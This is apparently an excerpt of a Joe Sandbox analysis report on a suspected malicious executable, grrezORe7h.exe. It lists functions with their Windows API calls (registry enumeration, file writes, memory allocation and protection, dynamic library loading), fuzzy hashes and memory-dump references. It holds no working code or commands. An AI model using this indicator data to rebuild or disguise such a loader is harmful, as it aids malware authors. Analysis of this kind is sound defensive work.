
Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000049E,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000049E,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C

Function 0040642B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
GetProcAddress.KERNEL32(00000000,?), ref: 00406458

Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D

Function 00405C2A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Function 00405700 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
GetLastError.KERNEL32 ref: 00405714

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D

Function 100028A4 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,0000049E,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768

Function 00405CDC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4

Function 00405CAD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D

Function 0040414E Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08

Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
